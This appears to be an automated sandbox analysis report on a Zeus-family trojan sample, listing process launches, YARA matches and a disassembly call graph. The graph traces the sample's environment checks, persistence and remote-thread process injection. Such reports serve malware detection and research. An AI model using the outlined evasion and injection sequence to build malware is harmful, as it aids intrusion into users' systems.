                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                          Start time:12:24:41
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                          Start time:12:24:41
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                          Start time:12:24:42
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                          Start time:12:24:44
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                          Start time:12:24:44
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                          Start time:12:24:45
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                          Start time:12:24:47
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                          Start time:12:24:47
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                          Start time:12:24:50
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                          Start time:12:24:50
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                          Start time:12:24:53
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:1.1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:64.6%
                                                                                                                                                                                                            Total number of Nodes:246
                                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                                            execution_graph 29818 402c10 LoadLibraryA GetModuleFileNameA 29890 403900 RegOpenKeyExA 29818->29890 29821 402c44 ExitProcess 29822 402c4c 29904 4020b0 CreateFileA 29822->29904 29827 402c81 29915 402240 CreateFileA 29827->29915 29828 402c69 GetTickCount PostMessageA 29828->29827 29837 402ca1 30027 401d80 40 API calls 29837->30027 29838 402cc3 IsUserAnAdmin GetModuleHandleA 29840 402cfc 29838->29840 29841 402cdd GetProcAddress 29838->29841 29844 402d02 29840->29844 29845 402d4e 29840->29845 29841->29840 29843 402cef GetCurrentProcess 29841->29843 29842 402ca6 29846 402cb2 29842->29846 29847 402caa ExitProcess 29842->29847 29843->29840 29850 402d06 StrStrIA 29844->29850 29851 402d1c 29844->29851 29848 402d56 StrStrIA 29845->29848 29849 402ddd 29845->29849 30028 403440 70 API calls 29846->30028 29855 402d81 29848->29855 29856 402d6c 29848->29856 29853 402810 9 API calls 29849->29853 29850->29851 29857 402d3f 29850->29857 29941 402810 RegCreateKeyExA 29851->29941 29860 402de8 GlobalFindAtomA 29853->29860 29859 402950 93 API calls 29855->29859 29863 402810 9 API calls 29856->29863 29981 402950 VirtualQuery GetModuleFileNameA 29857->29981 29865 402d86 GlobalFindAtomA 29859->29865 29866 402e38 ExitProcess 29860->29866 29867 402df8 GlobalAddAtomA IsUserAnAdmin 29860->29867 29862 402cb7 29862->29838 29869 402cbb ExitProcess 29862->29869 29870 402d77 29863->29870 29872 402dd6 29865->29872 29873 402d96 GlobalAddAtomA IsUserAnAdmin 29865->29873 29874 402e19 IsUserAnAdmin 29867->29874 29875 402e09 29867->29875 30029 4027b0 43 API calls 29870->30029 29881 4011c0 9 API calls 29872->29881 29878 402db7 IsUserAnAdmin 29873->29878 29879 402da7 29873->29879 29880 402e24 29874->29880 29875->29874 29883 402dc2 29878->29883 29879->29878 30031 4014b0 7 API calls 29880->30031 29882 402d49 29881->29882 29882->29866 30030 4014b0 7 API calls 29883->30030 29886 402e2f 29886->29866 29888 401580 32 API calls 29886->29888 29887 402dcd 29887->29872 29889 401580 32 API calls 29887->29889 29888->29866 29889->29872 29891 40394a RegQueryValueExA 29890->29891 29892 4039ad GetUserNameA CharUpperA strstr 29890->29892 29894 40397b RegCloseKey 29891->29894 29895 40396f RegCloseKey 29891->29895 29893 4039eb strstr 29892->29893 29897 402c40 29892->29897 29896 403a04 strstr 29893->29896 29893->29897 29894->29892 29898 40398e 29894->29898 29895->29892 29896->29897 29899 403a1d GetSystemWindowsDirectoryA GetVolumeInformationA 29896->29899 29897->29821 29897->29822 29898->29892 29898->29897 29899->29897 29900 403a5d 29899->29900 29900->29897 29901 403a79 GetModuleFileNameA StrStrIA 29900->29901 29901->29897 29902 403aa5 StrStrIA 29901->29902 29902->29897 29903 403ab7 StrStrIA 29902->29903 29903->29897 29905 402230 29904->29905 29906 402200 DeviceIoControl CloseHandle 29904->29906 29907 401fc0 memset SHGetFolderPathA 29905->29907 29906->29905 29908 402087 29907->29908 29909 40201e PathAppendA SetCurrentDirectoryA 29907->29909 29910 402092 FindWindowA 29908->29910 29911 40208b FreeLibrary 29908->29911 29909->29908 29912 402041 LoadLibraryA 29909->29912 29910->29827 29910->29828 29911->29910 29912->29908 29913 402055 GetProcAddress 29912->29913 29913->29908 29914 402065 29913->29914 29914->29908 29916 4022e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 29915->29916 29917 402324 29915->29917 29916->29917 29918 402330 SHGetFolderPathA 29917->29918 29919 402415 29918->29919 29920 402357 29918->29920 29922 402420 SHGetFolderPathA 29919->29922 29920->29920 29921 4023cc MoveFileA 29920->29921 29921->29919 29923 40254f 29922->29923 29924 40244b CreateFileA 29922->29924 29927 402560 CoInitializeEx 29923->29927 29924->29923 29926 4024b1 11 API calls 29924->29926 29926->29923 29928 40258e 29927->29928 29929 40259f GetModuleFileNameW SysAllocString 29927->29929 29928->29929 29931 4027a4 IsUserAnAdmin 29928->29931 29930 4025cd SysAllocString 29929->29930 29936 402746 29929->29936 29932 402733 SysFreeString 29930->29932 29933 4025de CoCreateInstance 29930->29933 29931->29837 29931->29838 29935 402743 SysFreeString 29932->29935 29932->29936 29934 402707 29933->29934 29938 402605 29933->29938 29934->29932 29935->29936 29936->29931 29937 40279e CoUninitialize 29936->29937 29937->29931 29938->29932 29938->29934 29939 402693 CoCreateInstance 29938->29939 29940 4026b5 29939->29940 29940->29934 29942 402855 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 29941->29942 29943 4028dd RegCreateKeyExA 29941->29943 29944 4028c0 29942->29944 29943->29944 29945 402924 29943->29945 29944->29944 29948 40291e RegSetValueExA 29944->29948 29946 40292c RegFlushKey RegCloseKey 29945->29946 29947 40293d GetCurrentProcessId 29945->29947 29946->29947 29949 401580 29947->29949 29948->29945 29950 4017e8 Sleep 29949->29950 29952 401596 29949->29952 29950->29866 29953 4015b5 29952->29953 29954 4015ab Sleep 29952->29954 30032 401c70 11 API calls 29952->30032 30033 401c70 11 API calls 29953->30033 29954->29952 29954->29953 29956 4015bc 29957 4017e3 29956->29957 29958 4015c4 OpenProcess 29956->29958 29957->29950 29958->29957 29959 4015df GetModuleHandleA 29958->29959 29960 401616 29959->29960 29961 4015fb GetProcAddress 29959->29961 29962 40161c GetModuleHandleA 29960->29962 29963 40164f VirtualAllocEx 29960->29963 29961->29960 29964 401609 GetCurrentProcess 29961->29964 29965 401632 GetProcAddress 29962->29965 29966 40163e 29962->29966 29967 4017c0 GetHandleInformation 29963->29967 29968 401692 WriteProcessMemory 29963->29968 29964->29960 29965->29966 29966->29963 29966->29967 29967->29957 29969 4017d6 29967->29969 29970 4016be 29968->29970 29971 40172f WriteProcessMemory FlushInstructionCache CreateRemoteThread 29968->29971 29969->29957 29972 4017dc CloseHandle 29969->29972 29973 4016c1 VirtualAlloc 29970->29973 29980 401729 29970->29980 29974 401772 GetHandleInformation 29971->29974 29975 40179e RtlCreateUserThread 29971->29975 29972->29957 29973->29970 29978 4016d9 memcpy WriteProcessMemory VirtualFree 29973->29978 29976 401795 29974->29976 29977 401788 29974->29977 29975->29967 29976->29967 29977->29976 29979 40178e CloseHandle 29977->29979 29978->29970 29979->29976 29980->29971 29982 4029b0 29981->29982 29982->29982 29983 4029bf PathFileExistsA 29982->29983 29984 4029d2 GetSystemWindowsDirectoryA 29983->29984 29985 402ad9 _snprintf CopyFileA 29983->29985 29986 4029e7 29984->29986 29987 402c06 29985->29987 29988 402b16 29985->29988 29986->29986 29989 4029ef GetModuleHandleA 29986->29989 30022 4011c0 VirtualQuery GetModuleFileNameA PathFileExistsA 29987->30022 29990 402810 9 API calls 29988->29990 29991 402a47 29989->29991 29992 402a27 GetProcAddress 29989->29992 29993 402b1f 29990->29993 29995 402a76 GetTickCount 29991->29995 30019 402a4d 29991->30019 29992->29991 29994 402a39 GetCurrentProcess 29992->29994 30034 401a30 29993->30034 29994->29991 30101 4012a0 GetTickCount GetModuleHandleA GetProcAddress 29995->30101 30000 402a82 30102 401330 GetTickCount GetModuleHandleA GetProcAddress 30000->30102 30003 402b39 RtlImageNtHeader 30006 402b44 30003->30006 30007 402b5d GetProcessHeap HeapValidate 30003->30007 30004 402b7d 30079 401b60 CreateFileA 30004->30079 30068 401000 30006->30068 30007->30004 30009 402b72 GetProcessHeap HeapFree 30007->30009 30009->30004 30011 402b5b 30011->30007 30012 402bcf 30015 402bdf GlobalFindAtomA 30012->30015 30090 4013c0 memset memset lstrcpynA CreateProcessA 30012->30090 30013 402baf GetProcAddress 30013->30012 30014 402bc1 GetCurrentProcess 30013->30014 30014->30012 30017 402bfb GlobalAddAtomA 30015->30017 30018 402bef 30015->30018 30017->29987 30020 4011c0 9 API calls 30018->30020 30019->29985 30021 402bf4 ExitProcess 30020->30021 30023 40128f 30022->30023 30024 40121c GetTempPathA GetTempFileNameA MoveFileExA 30022->30024 30023->29882 30024->30023 30025 401263 SetFileAttributesA DeleteFileA 30024->30025 30025->30023 30026 401283 MoveFileExA 30025->30026 30026->30023 30027->29842 30028->29862 30029->29882 30030->29887 30031->29886 30032->29952 30033->29956 30035 401b53 30034->30035 30036 401a4b 30034->30036 30053 4010a0 30035->30053 30037 4010a0 13 API calls 30036->30037 30038 401a54 30037->30038 30038->30035 30039 401a5e RtlImageNtHeader 30038->30039 30040 401b31 GetProcessHeap HeapValidate 30039->30040 30041 401a6f GetTickCount GetModuleHandleA 30039->30041 30040->30035 30042 401b47 GetProcessHeap HeapFree 30040->30042 30043 401a92 GetProcAddress 30041->30043 30044 401aa9 30041->30044 30042->30035 30043->30044 30045 401aa2 30043->30045 30044->30040 30046 401ac6 CreateFileA 30044->30046 30045->30044 30046->30040 30047 401ae9 WriteFile 30046->30047 30048 401b03 SetEndOfFile 30047->30048 30049 401b0a 30047->30049 30048->30049 30049->30040 30050 401b15 GetHandleInformation 30049->30050 30050->30040 30051 401b24 30050->30051 30051->30040 30052 401b2a CloseHandle 30051->30052 30052->30040 30054 4010b5 CreateFileA 30053->30054 30055 40118a 30053->30055 30054->30055 30058 4010da GetFileSizeEx 30054->30058 30056 401191 IsBadWritePtr 30055->30056 30057 4011a0 30055->30057 30056->30057 30057->30003 30057->30004 30059 40115e 30058->30059 30060 4010f4 GetProcessHeap RtlAllocateHeap 30058->30060 30059->30055 30062 40116e GetHandleInformation 30059->30062 30060->30059 30061 401110 memset 30060->30061 30061->30059 30063 401120 ReadFile 30061->30063 30062->30055 30064 40117d 30062->30064 30063->30059 30065 40113d GetProcessHeap HeapValidate 30063->30065 30064->30055 30066 401183 CloseHandle 30064->30066 30065->30059 30067 401152 GetProcessHeap HeapFree 30065->30067 30066->30055 30067->30059 30069 401090 30068->30069 30070 40100f 30068->30070 30069->30011 30070->30069 30071 401018 